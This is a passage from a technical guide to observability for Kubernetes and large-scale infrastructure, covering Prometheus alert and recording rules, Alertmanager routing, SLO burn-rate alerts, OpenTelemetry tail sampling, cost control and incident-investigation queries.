monitoring: prometheus # matches Prometheus serviceMonitorSelector
spec:
selector:
matchLabels:
app: payment-service
endpoints:
- port: metrics
path: /metrics
interval: 15s
scheme: https
tlsConfig:
caFile: /etc/prometheus/certs/ca.crt
```
`PrometheusRule` — Defines alert rules and recording rules as Kubernetes resources:
```yaml
apiVersion: monitoring.coreos.com/v1
kind: PrometheusRule
metadata:
name: payment-service-alerts
namespace: payments
labels:
monitoring: prometheus
spec:
groups:
- name: payment-service
interval: 30s
rules:
- alert: PaymentServiceHighErrorRate
expr: |
sum(rate(http_requests_total{namespace="payments",status=~"5.."}[5m]))
/
sum(rate(http_requests_total{namespace="payments"}[5m]))
> 0.05
for: 5m
labels:
severity: critical
team: payments
annotations:
summary: "Payment service error rate > 5%"
description: "Error rate is {{ $value | humanizePercentage }} for the last 5 minutes"
runbook_url: "https://runbooks.internal/payment-high-error-rate"
```
### Kubernetes Monitoring Tool Stack
|Tool|Layer Monitored|Deployment|Key Metrics|
|---|---|---|---|
|node_exporter|Node OS (CPU, memory, disk, network)|DaemonSet|`node_cpu_seconds_total`, `node_memory_MemAvailable_bytes`, `node_disk_io_time_seconds_total`|
|kube-state-metrics|Kubernetes object state|Deployment (single)|`kube_pod_status_phase`, `kube_deployment_status_replicas_available`, `kube_node_status_condition`|
|cAdvisor (kubelet)|Container resource usage|Built into kubelet|`container_cpu_usage_seconds_total`, `container_memory_working_set_bytes`|
|Prometheus Operator|Prometheus lifecycle|CRD-based operator|Manages Prometheus config from ServiceMonitors|
|Grafana Agent / Alloy|Unified telemetry agent|DaemonSet|Scrapes metrics, ships logs, forwards traces|
|Loki + Promtail|Log collection and storage|Promtail DaemonSet|All container logs via `/var/log/pods/`|
### Essential Kubernetes Alerts
The following alert rules cover the most critical Kubernetes failure modes:
```yaml
# Node conditions
- alert: KubernetesNodeNotReady
  expr: kube_node_status_condition{condition="Ready",status="true"} == 0
  for: 2m
  labels:
    severity: critical
# Pod failures
- alert: KubernetesPodCrashLooping
  expr: rate(kube_pod_container_status_restarts_total[15m]) * 60 * 15 > 5
  for: 0m
  labels:
    severity: warning
# Deployment health
- alert: KubernetesDeploymentReplicasMismatch
  expr: |
    kube_deployment_spec_replicas != kube_deployment_status_replicas_available
  for: 15m
  labels:
    severity: warning
# Persistent volume
- alert: KubernetesPersistentVolumeFillingUp
  expr: |
    kubelet_volume_stats_available_bytes
      / kubelet_volume_stats_capacity_bytes
      < 0.15
  for: 1m
  labels:
    severity: warning
# Resource pressure
- alert: KubernetesMemoryPressure
  expr: kube_node_status_condition{condition="MemoryPressure",status="true"} == 1
  for: 2m
  labels:
    severity: critical
# HPA at maximum
- alert: KubernetesHPAMaxReplicasReached
  expr: |
    kube_horizontalpodautoscaler_status_current_replicas
      == kube_horizontalpodautoscaler_spec_max_replicas
  for: 15m
  labels:
    severity: warning
```
### Log Collection in Kubernetes
Container logs in Kubernetes are written to stdout/stderr and are available at `/var/log/pods/<namespace>_<pod>_<uid>/<container>/` on each node. Promtail (Loki's log collector) runs as a DaemonSet and tails these files, enriching each log line with Kubernetes metadata labels before shipping to Loki:
```yaml
# promtail-config.yaml
scrape_configs:
  - job_name: kubernetes-pods
    kubernetes_sd_configs:
      - role: pod
    pipeline_stages:
      - cri: {}  # parse CRI log format
      - json:    # parse structured JSON logs
          expressions:
            level: level
            trace_id: trace_id
            service: service
      - labels:
          # promote only bounded-cardinality fields to labels;
          # trace_id stays a parsed field (unbounded cardinality)
          level:
    relabel_configs:
      - source_labels: [__meta_kubernetes_namespace]
        target_label: namespace
      - source_labels: [__meta_kubernetes_pod_name]
        target_label: pod
      - source_labels: [__meta_kubernetes_pod_container_name]
        target_label: container
      - source_labels: [__meta_kubernetes_pod_label_app]
        target_label: app
```
---
## 10. Observability Architecture for Large Infrastructure
### Architectural Principles for Scale
At small scale — a handful of services, a single Kubernetes cluster — the observability stack can be simple: a single Prometheus instance, a single Loki instance, a Grafana deployment. At large scale — hundreds of services, multiple clusters, hybrid cloud — the observability infrastructure must itself be designed with the same reliability and scalability principles applied to production workloads.
Key principles:
**Separation of collection from storage:** Collection agents (OTel Collector, Promtail, node_exporter) run close to the data sources and should be lightweight and resilient. Storage systems (Mimir, Loki, Tempo) can be centralized and scaled independently.
**Federation and hierarchy:** A large infrastructure often uses a federated Prometheus model, where each cluster runs its own Prometheus (shard) and a central Prometheus (or Mimir) aggregates cross-cluster data. Grafana queries the central tier for global dashboards and the local shards for per-cluster detail.
**Multi-tenancy:** In shared infrastructure, teams should be able to query their own telemetry without access to other teams' data. Loki, Mimir, and Tempo all support multi-tenancy via tenant headers. The OTel Collector and Grafana authentication layer enforce tenant isolation.
**High availability:** Production observability infrastructure must itself be highly available. A Prometheus outage that coincides with a production incident is especially damaging. Prometheus HA involves running two identical instances scraping the same targets, with deduplication handled by Alertmanager or Mimir.
### Reference Architecture: Enterprise Scale
```
┌─────────────────────────────────────────────────────────────────────┐
│ Application Layer │
│ │
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │
│ │ Service A │ │ Service B │ │ Service C │ │
│ │ OTel SDK │ │ OTel SDK │ │ OTel SDK │ │
│ └──────┬───────┘ └──────┬───────┘ └──────┬───────┘ │
└─────────┼─────────────────┼─────────────────┼───────────────────────┘
│ OTLP │ OTLP │ OTLP
▼ ▼ ▼
┌─────────────────────────────────────────────────────────────────────┐
│ OTel Collector Layer │
│ │
│ ┌─────────────────────────────────────────────────────────────┐ │
│ │ OTel Collector (DaemonSet / Sidecar) │ │
│ │ │ │
│ │ Receivers: OTLP, Prometheus scrape │ │
│ │ Processors: batch, memory_limiter, tail_sampling, │ │
│ │ resource enrichment, attribute filtering │ │
│ │ Exporters: OTLP/Mimir, OTLP/Tempo, OTLP/Loki │ │
│ └────────────────────────────────────────────────────────── ┘ │
└─────────────────────────────────────────────────────────────────────┘
│ │ │
│ Remote Write │ OTLP │ Push API
▼ ▼ ▼
┌───────────────────┐ ┌───────────────────┐ ┌───────────────────┐
│ Grafana Mimir │ │ Grafana Tempo │ │ Grafana Loki │
│ (Metrics) │ │ (Traces) │ │ (Logs) │
│ │ │ │ │ │
│ S3 backend │ │ S3 backend │ │ S3 backend │
│ Multi-tenant │ │ Multi-tenant │ │ Multi-tenant │
│ Long retention │ │ 14d default │ │ 30d default │
└─────────┬─────────┘ └────────┬───────────┘ └────────┬──────────┘
│ │ │
└─────────────────────┼────────────────────────┘
▼
┌────────────────────┐
│ Grafana │
│ │
│ Data sources: │
│ - Mimir (metrics)│
│ - Tempo (traces) │
│ - Loki (logs) │
│ │
│ Dashboards │
│ Alerting │
│ OnCall │
└────────┬──────────┘
│
▼
┌────────────────────┐
│ Alertmanager │
│ │
│ PagerDuty │
│ Slack │
│ OpsGenie │
└────────────────────┘
```
### Multi-Cluster Architecture
For multiple Kubernetes clusters, the observability architecture adds a cluster-level Prometheus layer before the central aggregation:
**Per-cluster (local) Prometheus:**
- Scrapes all cluster-local targets
- Evaluates cluster-local alert rules (pod failures, node pressure, deployment health)
- Retains 2 days of data locally for immediate investigation
- Remote-writes all metrics to central Mimir
**Central Mimir:**
- Receives remote writes from all cluster Prometheuses
- Long-term retention (1 year+)
- Cross-cluster queries
- Multi-tenant isolation (one tenant per team)
**Cross-cluster federation query:**
```promql
# Query across all clusters — Mimir handles federation
sum by (cluster, namespace) (
rate(http_requests_total{status=~"5.."}[5m])
)
```
### Capacity Planning for Observability Infrastructure
|Component|Scaling Dimension|Rule of Thumb|Notes|
|---|---|---|---|
|Prometheus|Active time series|~1.3 bytes/sample on disk; roughly 3-5 KB RAM per active series|1M active series ≈ 5GB RAM|
|Mimir Ingester|Write throughput|~1M samples/sec per ingester|3 replicas minimum|
|Loki Ingester|Log throughput|~1MB/s per ingester per tenant|Scale with log volume|
|Tempo Ingester|Trace throughput|~50MB/s per ingester|Scale with trace sampling rate|
|OTel Collector|Telemetry throughput|1000 spans/sec per single-core collector|Scale horizontally|
|Grafana|Dashboard users|50-200 concurrent users per instance|Cache layer helps|
---
## 11. Alerting and Incident Management
### Alert Design Philosophy
Alerting is the bridge between observability and operational response. A well-designed alert system wakes up the right engineer at the right time with enough context to act. A poorly designed alert system produces noise that trains engineers to ignore it, delays real incident detection, and degrades team health through interrupted sleep and alarm fatigue.
The core principles of alert design:
**Every alert must be actionable.** If the on-call engineer receives an alert and there is no action they should take, the alert should not exist. Non-actionable alerts should be either eliminated or converted to dashboard annotations.
**Every alert must have a runbook.** The annotation on every PrometheusRule should include a `runbook_url` pointing to a documented response procedure. During an incident at 3am, an engineer should be able to follow the runbook without needing to reason from first principles.
**Alert on symptoms, not causes.** Alert on user-facing impact: error rate elevated, latency degraded, service unreachable. Do not alert on potential causes that may or may not produce symptoms: CPU elevated, disk 70% full. Cause-level alerts create noise without corresponding user impact; they are better expressed as dashboard warnings.
**Calibrate severity.** Not every problem requires immediate wakeup. A well-structured severity model:
- **P1/Critical:** User-facing impact right now, requires immediate wakeup. SLO burn rate alert.
- **P2/High:** Likely user impact within hours if unaddressed. Acknowledge during business hours.
- **P3/Medium:** No immediate impact, but trending toward a problem. Ticket for next sprint.
- **P4/Low:** Informational. Dashboard only.
### Alertmanager Architecture
Alertmanager is Prometheus's companion for alert routing, deduplication, grouping, and notification delivery.
```
Prometheus ─── alerts ──► Alertmanager
│
┌─────▼──────┐
│ Dedup │ Remove duplicate alerts (same
│ │ alert from multiple Prometheus)
└─────┬──────┘
│
┌─────▼──────┐
│ Grouping │ Batch related alerts into
│ │ single notification
└─────┬──────┘
│
┌─────▼──────┐
│ Inhibition │ Suppress child alerts when
│ │ parent alert is firing
└─────┬──────┘
│
┌─────▼──────┐
│ Routing │ Route to correct receiver
│ │ based on labels
└─────┬──────┘
│
┌──────────┼──────────┐
▼ ▼ ▼
PagerDuty Slack OpsGenie
```
**Alertmanager configuration:**
```yaml
global:
  resolve_timeout: 5m
  slack_api_url: 'https://hooks.slack.com/services/...'
route:
  group_by: ['alertname', 'cluster', 'service']
  group_wait: 30s       # wait before sending first notification (allow grouping)
  group_interval: 5m    # interval for sending follow-up notifications
  repeat_interval: 3h   # re-send if still firing
  receiver: 'default-slack'
  routes:
    - match:
        severity: critical
      receiver: 'pagerduty-critical'
      continue: true    # keep evaluating later routes as well
    - match:
        severity: critical
        team: payments
      receiver: 'pagerduty-payments-team'
    - match_re:
        service: '(payment|fraud|settlement)'
      receiver: 'payments-slack'
receivers:
  - name: 'default-slack'
    slack_configs:
      - channel: '#alerts'
        title: '[{{ .Status | toUpper }}{{ if eq .Status "firing" }}:{{ .Alerts.Firing | len }}{{ end }}] {{ .CommonLabels.alertname }}'
        text: >-
          {{ range .Alerts }}
          *Alert:* {{ .Annotations.summary }}
          *Description:* {{ .Annotations.description }}
          *Runbook:* {{ .Annotations.runbook_url }}
          {{ end }}
  - name: 'pagerduty-critical'
    pagerduty_configs:
      - service_key: '${PAGERDUTY_SERVICE_KEY}'
        description: '{{ .CommonLabels.alertname }}: {{ .CommonAnnotations.summary }}'
        severity: '{{ if eq .CommonLabels.severity "critical" }}critical{{ else }}warning{{ end }}'
inhibit_rules:
  - source_match:
      severity: 'critical'
      alertname: 'ClusterDown'
    target_match:
      severity: 'warning'
    equal: ['cluster']  # suppress warnings when the same cluster is down
```
### Multi-Window Burn Rate Alert Rules
The most production-appropriate SLO alerting strategy uses multiple observation windows to balance sensitivity (catching real problems quickly) with specificity (not firing for transient spikes):
```yaml
# Payment API SLO: 99.9% over 28 days
groups:
  - name: payment-api-slo
    rules:
      # Fast burn: consuming budget at 14.4x rate over the last hour
      # Will exhaust the 28-day budget in 2 days
      - alert: PaymentAPIErrorBudgetFastBurn
        expr: |
          (
            sum(rate(http_requests_total{service="payment-api",status=~"5.."}[1h]))
            / sum(rate(http_requests_total{service="payment-api"}[1h]))
          ) > (14.4 * 0.001)
          and
          (
            sum(rate(http_requests_total{service="payment-api",status=~"5.."}[5m]))
            / sum(rate(http_requests_total{service="payment-api"}[5m]))
          ) > (14.4 * 0.001)
        labels:
          severity: critical
        annotations:
          summary: "Payment API burning error budget at 14.4x rate"
          runbook_url: "https://runbooks.internal/payment-error-budget"
      # Slow burn: consuming budget at 3x rate over the last 6 hours
      # Will exhaust the 28-day budget in 9 days
      - alert: PaymentAPIErrorBudgetSlowBurn
        expr: |
          (
            sum(rate(http_requests_total{service="payment-api",status=~"5.."}[6h]))
            / sum(rate(http_requests_total{service="payment-api"}[6h]))
          ) > (3 * 0.001)
          and
          (
            sum(rate(http_requests_total{service="payment-api",status=~"5.."}[30m]))
            / sum(rate(http_requests_total{service="payment-api"}[30m]))
          ) > (3 * 0.001)
        labels:
          severity: warning
        annotations:
          summary: "Payment API burning error budget at 3x rate"
```
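Where the 14.4 and 3 multipliers come from: a burn rate of N means the service is consuming error budget N times faster than the rate that would exactly exhaust it at the end of the window. A small sketch of the arithmetic for the 99.9%/28-day SLO above:

```python
# Burn-rate arithmetic for a 99.9% SLO over a 28-day window.
# A burn rate of N consumes the error budget N times faster than
# the rate that would exactly exhaust it at window end.

def burn_rate_threshold(slo_target: float, burn_rate: float) -> float:
    """Error-rate threshold for an alert at the given burn rate."""
    error_budget = 1.0 - slo_target          # 0.001 for a 99.9% SLO
    return burn_rate * error_budget

def days_to_exhaustion(window_days: float, burn_rate: float) -> float:
    """Days until the whole window's budget is gone at this burn rate."""
    return window_days / burn_rate

fast = burn_rate_threshold(0.999, 14.4)      # the (14.4 * 0.001) term above
slow = burn_rate_threshold(0.999, 3.0)       # the (3 * 0.001) term above
print(f"fast burn: error rate > {fast:.4f}, "
      f"budget gone in {days_to_exhaustion(28, 14.4):.1f} days")
print(f"slow burn: error rate > {slow:.4f}, "
      f"budget gone in {days_to_exhaustion(28, 3.0):.1f} days")
```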
### Recording Rules
Recording rules pre-compute expensive or frequently-used PromQL expressions and store the result as a new time series. This improves dashboard load times and reduces query load on Prometheus:
```yaml
groups:
  - name: http_metrics
    interval: 30s
    rules:
      # Pre-compute per-service error rate (used in many dashboards)
      - record: job:http_error_rate:ratio_rate5m
        expr: |
          sum(rate(http_requests_total{status=~"5.."}[5m])) by (service)
          / sum(rate(http_requests_total[5m])) by (service)
      # Pre-compute p99 latency per service
      - record: job:http_request_duration_p99:5m
        expr: |
          histogram_quantile(0.99,
            sum(rate(http_request_duration_seconds_bucket[5m])) by (le, service)
          )
      # Pre-compute request rate per service
      - record: job:http_request_rate:rate5m
        expr: |
          sum(rate(http_requests_total[5m])) by (service)
```
---
## 12. Observability Data Pipelines
### The Telemetry Pipeline Problem
At production scale, telemetry data volumes are substantial:
- A 100-service platform at 1,000 RPS each generates 100,000 traces/second (at 100% sampling)
- Each trace averages 10 spans at 500 bytes each: 500MB/second of trace data
- The same platform generates 10,000 log lines/second at 500 bytes each: 5MB/second of log data
- Prometheus scrapes 2,000,000 active time series every 15 seconds: 8 million data points/minute
Without a pipeline architecture that can filter, sample, and buffer this data, the storage costs are prohibitive and the query systems are overwhelmed.
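The arithmetic behind those figures is worth making explicit. A quick sketch using the numbers from the list above (illustrative constants, not measurements):

```python
# Back-of-the-envelope telemetry volumes for a 100-service platform.
SERVICES = 100
RPS_PER_SERVICE = 1_000
SPANS_PER_TRACE = 10
BYTES_PER_SPAN = 500

traces_per_sec = SERVICES * RPS_PER_SERVICE          # at 100% sampling
trace_bytes_per_sec = traces_per_sec * SPANS_PER_TRACE * BYTES_PER_SPAN

LOG_LINES_PER_SEC = 10_000
BYTES_PER_LINE = 500
log_bytes_per_sec = LOG_LINES_PER_SEC * BYTES_PER_LINE

ACTIVE_SERIES = 2_000_000
SCRAPE_INTERVAL_S = 15
samples_per_min = ACTIVE_SERIES * 60 // SCRAPE_INTERVAL_S

print(f"traces: {traces_per_sec:,}/s -> {trace_bytes_per_sec / 1e6:.0f} MB/s")
print(f"logs:   {log_bytes_per_sec / 1e6:.0f} MB/s")
print(f"metric samples: {samples_per_min:,}/min")
```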
### OpenTelemetry Collector as Pipeline
The OTel Collector's pipeline model allows complex data transformation before data reaches storage:
**Tail-based sampling** is the most impactful pipeline capability for trace data. Unlike head-based sampling (where the decision to sample is made at the start of a trace, before the outcome is known), tail-based sampling makes the decision after the entire trace is complete. This allows 100% capture of error traces and slow traces, while discarding 95-99% of successful fast traces.
Configuration of tail sampling:
```yaml
processors:
  tail_sampling:
    decision_wait: 10s    # wait up to 10s for all spans to arrive
    num_traces: 100000    # hold up to 100k traces in memory simultaneously
    expected_new_traces_per_sec: 10000
    policies:
      # Always keep error traces
      - name: keep-errors
        type: status_code
        status_code: {status_codes: [ERROR]}
      # Always keep slow traces (> 1s)
      - name: keep-slow
        type: latency
        latency: {threshold_ms: 1000}
      # Keep traces from specific high-value services
      - name: keep-payment-traces
        type: string_attribute
        string_attribute:
          key: service.name
          values: [payment-service, fraud-service]
      # Keep 5% of remaining traces
      - name: probabilistic-fallback
        type: probabilistic
        probabilistic: {sampling_percentage: 5}
```
With this configuration, a system generating 10,000 traces/second retains on the order of 500-700 traces/second — a reduction of roughly 93-95% in storage costs while retaining 100% of actionable traces.
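The retained volume under these policies is easy to estimate. A sketch, where the error and slow-trace fractions are illustrative assumptions:

```python
# Estimated retention under tail-sampling policies:
# keep 100% of errors and slow traces, plus a probabilistic fallback.
def retained_per_sec(total: float, err_frac: float, slow_frac: float,
                     fallback_pct: float) -> float:
    kept_always = total * (err_frac + slow_frac)   # errors + slow, kept 100%
    remainder = total - kept_always
    return kept_always + remainder * fallback_pct / 100

# Assumed: 0.5% errors, 1% slow, 5% probabilistic fallback.
kept = retained_per_sec(10_000, err_frac=0.005, slow_frac=0.01, fallback_pct=5)
print(f"retained ~{kept:.0f} of 10,000 traces/s ({kept / 10_000:.1%})")
```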
### Scaling the Collection Layer
For large infrastructure, a single OTel Collector is a single point of failure and a throughput bottleneck. The Collector is designed to scale horizontally in two deployment patterns:
**Agent mode:** A Collector instance runs on each node (as a DaemonSet in Kubernetes) and collects local telemetry. Agents forward to a central tier.
**Gateway mode:** A pool of Collector instances (a Kubernetes Deployment) receives from agents and applies expensive operations (tail sampling, cross-service enrichment). Gateways forward to storage backends.
```
[Application] ──OTLP──► [Collector Agent (DaemonSet)]
│
│ OTLP (load balanced)
▼
[Collector Gateway (Deployment, 3-10 replicas)]
│
┌───────────┼───────────┐
▼ ▼ ▼
[Mimir] [Tempo] [Loki]
```
**Kafka as a telemetry buffer:**
For very high volume environments, inserting Kafka between the collection and storage layers provides:
- **Backpressure buffering:** If Loki is slow, log data queues in Kafka rather than being dropped
- **Fan-out:** Multiple consumers can read the same telemetry stream independently
- **Replay:** Telemetry can be reprocessed if storage systems are updated or replaced
```yaml
# OTel Collector exporter to Kafka
exporters:
  kafka:
    brokers: [kafka-1:9092, kafka-2:9092, kafka-3:9092]
    topic: otel-traces
    encoding: otlp_proto

# A separate Collector instance consumes Kafka → Tempo
# (kafka-consumer-group approach with the OTel Collector receiver)
receivers:
  kafka:
    brokers: [kafka-1:9092]
    topic: otel-traces
    group_id: tempo-consumer
```
---
## 13. Observability Cost Optimization
### The Economics of Observability
Observability infrastructure has real and significant costs. At enterprise scale:
- Metrics storage: millions of time series × retention period × bytes/sample
- Log storage: gigabytes to terabytes per day
- Trace storage: even at 5% sampling, traces are the most data-dense telemetry type
- Compute: query engines, collection agents, alerting infrastructure
Without active cost management, observability costs grow proportionally with the number of services and can reach 10-30% of total infrastructure spend. The goal is not to minimize observability investment — good observability pays for itself in reduced MTTR — but to ensure that spending is proportional to value.
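For a sense of scale, the metrics-storage dimension can be sketched directly from those factors. All inputs below are assumptions; ~1.3 bytes/sample is a commonly cited figure for Prometheus's on-disk compression:

```python
# Rough metrics-storage estimate: series x samples/day x retention x bytes/sample.
def metrics_storage_gb(series: int, scrape_interval_s: int,
                       retention_days: int, bytes_per_sample: float = 1.3) -> float:
    samples_per_day = 86_400 / scrape_interval_s
    total_bytes = series * samples_per_day * retention_days * bytes_per_sample
    return total_bytes / 1e9

gb = metrics_storage_gb(series=2_000_000, scrape_interval_s=15, retention_days=365)
print(f"~{gb:,.0f} GB for 2M series, 15s scrape interval, 1 year retention")
```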
### High-Cardinality Metrics Management
High-cardinality metrics are the primary driver of Prometheus memory usage and storage costs. A metric with 1,000,000 unique label combinations creates 1,000,000 time series, each requiring memory in Prometheus.
**Detection:**
```promql
# Find metrics with highest cardinality
topk(10, count by (__name__)({__name__=~".+"}))
# Count the distinct values of one label on a specific metric
count(count by (status_code)(http_requests_total))
```
**Mitigation strategies:**
1. **Remove high-cardinality labels at collection:** Use relabeling in Prometheus or the OTel Collector to drop or hash labels before they reach storage.
2. **Replace exact values with bucketed categories:** Instead of `user_id`, use `user_tier` (free, paid, enterprise). Instead of exact `status_code`, use `status_class` (2xx, 4xx, 5xx).
3. **Use recording rules to pre-aggregate:** If you only ever need per-service error rates (not per-endpoint-per-service), create a recording rule that aggregates away the endpoint label.
4. **Implement metric allow-lists:** In the OTel Collector or Prometheus, configure explicit allow-lists of metrics and label combinations that should be collected. Everything else is dropped.
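The reason strategy 2 is so effective is that series counts multiply across labels. A small sketch (the label counts are hypothetical):

```python
# Series count is bounded by the product of per-label cardinalities
# (the bound is reached when every label combination actually occurs).
from math import prod

def series_upper_bound(label_cardinalities: dict[str, int]) -> int:
    return prod(label_cardinalities.values())

raw = series_upper_bound({"service": 100, "endpoint": 50, "status_code": 60})
bucketed = series_upper_bound({"service": 100, "endpoint": 50, "status_class": 3})
print(f"raw: {raw:,} series; with status bucketing: {bucketed:,} series")
```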
### Log Volume Management
Log volumes can grow rapidly in verbose applications. Key cost controls:
**Log level enforcement:** Production workloads should emit INFO or higher. Debug logs should be disabled by default and enabled dynamically for specific services during incident investigation.
**Structured log filtering:** The OTel Collector can drop log entries matching certain patterns before they reach Loki:
```yaml
processors:
  filter:
    logs:
      exclude:
        match_type: regexp
        record_attributes:
          - key: level
            value: DEBUG
```
**Loki retention policies:** Different log streams can have different retention periods. Security audit logs require long retention (1-7 years). Application debug logs need only 7 days. HTTP access logs can be dropped after 30 days.
**Stream sharding:** Loki performance degrades with very high-cardinality stream label sets. Ensure that Loki labels are bounded: `namespace`, `app`, and `level` are good labels; `request_id`, `user_id`, and IP addresses are not.
### Trace Sampling Strategy
|Sampling Strategy|Mechanism|Use Case|Tradeoff|
|---|---|---|---|
|Head-based (rate)|Decision at trace start, 1-10%|Simple, low overhead|Loses errors if they're rare|
|Head-based (always error)|Decision at trace start based on context|Capture all errors from start|Requires propagating error context before it's known|
|Tail-based|Decision after trace complete|Capture errors + slow traces, drop healthy fast traces|Requires buffering entire traces; OTel Collector overhead|
|Adaptive|Dynamic rate based on traffic volume|Maintain target trace volume regardless of load|Complex; requires feedback loop|
|Exemplar sampling|Store trace ID on histogram sample|Link specific traces to metric data points|Not true sampling; exemplars are sparse attachments|
The recommended production strategy: tail-based sampling in the OTel Collector with policies: keep 100% of errors, keep 100% of traces > 1s, keep 5% of the remainder. This typically reduces trace volume by 90-95% while retaining 100% of actionable traces.
---
## 14. Incident Investigation Using Observability
### The Standard Investigation Workflow
A disciplined investigation workflow reduces the time from alert to root cause. The following model works consistently across failure types:
```
[1] Alert Fires
│
▼
[2] What is the user impact?
│ Metrics: error rate, latency SLO compliance
│ Dashboards: service health overview
▼
[3] When did it start?
│ Metrics: annotate deployment events, config changes
│ Grafana: correlate alert start with recent changes
▼
[4] Which service(s) are affected?
│ Metrics: error rates across all downstream services
│ Grafana: service topology graph
▼
[5] What are the errors?
│ Logs: ERROR-level logs in the affected time window
│ LogQL: {namespace="X"} |= "ERROR" | json
▼
[6] Trace the failing requests
│ Traces: search Tempo for error traces in affected service
│ TraceQL: {resource.service.name="X" && status=error}
▼
[7] Identify root cause
│ Traces: find the deepest error span
│ Logs: correlate trace_id to get full context
▼
[8] Remediate
│ Rollback, config change, feature flag toggle, scaling
▼
[9] Verify recovery
│ Metrics: confirm error rate returns to baseline
│ SLO dashboard: confirm budget burn rate normalizes
▼
[10] Postmortem and action items
```
### Practical Investigation Commands
**Step 2: Quantify impact**
```promql
# Current error rate
sum(rate(http_requests_total{namespace="payments",status=~"5.."}[5m]))
/ sum(rate(http_requests_total{namespace="payments"}[5m]))
# Fraction of the 28-day error budget (0.1% of requests) consumed in the last 24h
sum(increase(http_requests_total{status=~"5.."}[24h]))
/ (sum(increase(http_requests_total[28d])) * 0.001)
```
**Step 3: Correlate with changes**
```promql
# Compare error rate before and after the suspect deployment
sum(rate(http_requests_total{status=~"5.."}[30m] offset 1h))
/ sum(rate(http_requests_total[30m] offset 1h))
```
**Step 5: Query error logs**
```logql
# Find all errors in the payments namespace (the 30-minute window is set
# by the query's time range in Grafana or logcli, not inside LogQL)
{namespace="payments"} | json | level="ERROR"
  | line_format "{{.timestamp}} [{{.service}}] {{.event}}: {{.error}}"
# Narrow to a specific release (assumes logs carry a version field)
{namespace="payments"} | json | level="ERROR" | version="v1.42.0"
```
**Step 6: Find failing traces**
TraceQL (Grafana Tempo):
```traceql
{resource.service.name="payment-service" && status=error}
  | select(span.http.route, span.http.status_code, resource.service.version)
```
Results can then be sorted by duration in the Tempo search UI.
### Root Cause Analysis Techniques
**The Five Whys applied to distributed systems:**
1. _Why is the payment API returning 500 errors?_ → The payment service cannot connect to the fraud service
2. _Why can't it connect to the fraud service?_ → The fraud service connection pool is exhausted
3. _Why is the connection pool exhausted?_ → Requests to the fraud service are taking 10 seconds instead of 100ms
4. _Why is the fraud service responding slowly?_ → The fraud model Redis cache is unavailable
5. _Why is Redis unavailable?_ → The Redis instance was evicted due to node memory pressure after a memory leak in the recommendation service
Without distributed tracing, the investigation would have stopped at step 1 with "the fraud service is down." With traces, the full causal chain is recoverable from the telemetry.
**Change correlation:** The single most reliable root cause identification technique is correlating the incident start time with recent changes. In a Grafana dashboard with deployment annotations overlaid on error rate metrics, the causal relationship is often immediately visible. Building a discipline of annotating dashboards with deployment events (via the Grafana Annotations API or deployment pipeline webhooks) is high-return investment.
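As a minimal sketch of the webhook approach, a deployment pipeline can POST to Grafana's `/api/annotations` endpoint. The URL, token, and tag names below are placeholders, not values from this document:

```python
# Post a deployment annotation to Grafana (POST /api/annotations).
import json
import time
import urllib.request

GRAFANA_URL = "https://grafana.internal"   # placeholder
API_TOKEN = "glsa_..."                     # placeholder service-account token

def deployment_annotation(service: str, version: str) -> dict:
    """Build the annotation payload Grafana expects (time in epoch millis)."""
    return {
        "time": int(time.time() * 1000),
        "tags": ["deployment", service],
        "text": f"Deployed {service} {version}",
    }

def post_annotation(payload: dict) -> None:
    req = urllib.request.Request(
        f"{GRAFANA_URL}/api/annotations",
        data=json.dumps(payload).encode(),
        headers={"Authorization": f"Bearer {API_TOKEN}",
                 "Content-Type": "application/json"},
        method="POST",
    )
    urllib.request.urlopen(req)

# Example (from a deploy pipeline step):
# post_annotation(deployment_annotation("payment-api", "v1.42.0"))
```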
---
## 15. Advanced Observability
### eBPF-Based Observability
eBPF (extended Berkeley Packet Filter) is a Linux kernel feature that allows user-defined programs to run in the kernel context, observing and optionally modifying kernel behavior, without kernel module development or application code changes.
For observability, eBPF enables:
**Zero-instrumentation application tracing:** eBPF programs can intercept system calls, network connections, and function calls in arbitrary processes without modifications to those processes. Tools like Cilium Tetragon, Pixie, and Parca use eBPF to observe application behavior from the kernel.
**Network flow observability:** Cilium's eBPF-based dataplane records all network flows (source, destination, protocol, bytes, latency) at the kernel level, generating Prometheus metrics without any application involvement.
**CPU profiling:** Continuous CPU profiling (flame graphs) using eBPF samples the call stacks of all processes periodically, attributing CPU time to specific functions. Grafana Pyroscope collects these profiles and correlates them with traces.
**Security observability:** eBPF programs can detect system calls associated with container escapes, privilege escalation, and unusual network access patterns. Falco uses eBPF (or kernel modules) for runtime security monitoring.
### Anomaly Detection
Rule-based alerting excels at known failure modes (error rate > threshold) but misses anomalies — deviations from normal behavior that were not defined in advance as failure modes.
**Statistical anomaly detection** models baseline behavior and alerts on deviations from that baseline. Prometheus can implement simple statistical anomaly detection:
```promql
# Alert if the current request rate is more than 3 standard deviations
# from its average over the last 2 weeks (subquery at 1h resolution)
abs(
rate(http_requests_total[5m])
- avg_over_time(rate(http_requests_total[5m])[2w:1h])
)
> 3 * stddev_over_time(rate(http_requests_total[5m])[2w:1h])
```
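The same z-score logic, expressed in plain code for clarity (the baseline values are illustrative):

```python
# Z-score anomaly check: flag values far from the historical baseline,
# the same logic as the PromQL expression above.
from statistics import mean, stdev

def is_anomalous(current: float, history: list[float],
                 threshold: float = 3.0) -> bool:
    """Flag values more than `threshold` standard deviations from the mean."""
    mu, sigma = mean(history), stdev(history)
    if sigma == 0:
        return current != mu
    return abs(current - mu) > threshold * sigma

baseline = [100, 102, 98, 101, 99, 103, 97, 100]  # req/s samples
print(is_anomalous(150, baseline))  # far outside the baseline -> True
print(is_anomalous(101, baseline))  # within the baseline -> False
```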
More sophisticated anomaly detection uses machine learning models trained on historical telemetry. Platforms like Grafana Machine Learning (in Grafana Cloud), Datadog Watchdog, and commercial AIOps products apply ML-based anomaly detection to metrics streams.
### Distributed Tracing Sampling at Scale
At very high trace volumes, even tail sampling in the OTel Collector may not be sufficient. Advanced strategies:
**Adaptive sampling:** Dynamically adjust sampling rate to maintain a target ingest volume regardless of traffic. At 1,000 RPS, sample 10%. At 10,000 RPS, sample 1%. Implements a feedback loop: if ingest rate is above target, reduce sampling probability; if below, increase it.
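The feedback loop can be as simple as proportionally rescaling the sampling probability each interval. A sketch, not a production controller (real implementations smooth the adjustment over multiple intervals):

```python
# Adaptive sampling: nudge the sampling probability so that the sampled
# trace rate tracks a target ingest rate.
def adjust_probability(current_p: float, observed_per_sec: float,
                       target_per_sec: float,
                       min_p: float = 0.001, max_p: float = 1.0) -> float:
    """Scale probability by target/observed, clamped to [min_p, max_p]."""
    if observed_per_sec <= 0:
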